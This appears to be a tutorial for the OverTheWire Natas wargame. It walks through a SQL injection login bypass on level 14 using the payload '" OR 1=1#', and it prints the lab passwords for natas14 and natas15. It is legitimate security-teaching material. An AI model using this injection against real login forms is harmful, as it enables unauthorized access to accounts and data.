OverTheWire Natas Level 13 → 14 tutorial!!

Login

URL: http://natas14.natas.labs.overthewire.org
Credentials: natas14: z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

# Using curl (optional):
curl -u natas14:z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ http://natas14.natas.labs.overthewire.org/

Task

This level provides a login form backed by a MySQL database. Looking at the source code reveals that user input is directly concatenated into a SQL query without sanitization.

A little bit of Theory

Source snippet:

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";

Problems here:

• Inputs are not sanitized or parameterized.
• This enables SQL Injection — malicious SQL in the username or password fields can alter query logic.

Example:

SELECT * FROM users WHERE username="user" AND password="pass"

If we inject into username with:

" OR 1=1#

The resulting query becomes:

SELECT * FROM users WHERE username="" OR 1=1# " AND password="pass"

• OR 1=1 is always true.
• # starts a comment, ignoring the rest.
• The query now always returns rows, bypassing authentication.

Solution

1. Open the login form

2. Inject into the username field

   " OR 1=1#
   

   Password field can be anything (abc, test, doesn’t matter).

3. Submit

   The query is forced true, and you get:

   Successful login! The password for natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx
   

   

Password

SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

Troubleshooting

• Still getting “Access denied”? → Double-check you typed the injection correctly, including quotes, spaces, and #.
• Query error? → Some shells auto-escape characters. Always inject directly in the web form (or URL encode if testing via curl).
• Blank page? → Try adding extra spaces after # so the comment consumes the remainder of the query.

Congrats 🎉 You just performed a classic SQL Injection to bypass login and dumped the password for natas15. Next up is a trickier blind SQLi challenge.

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨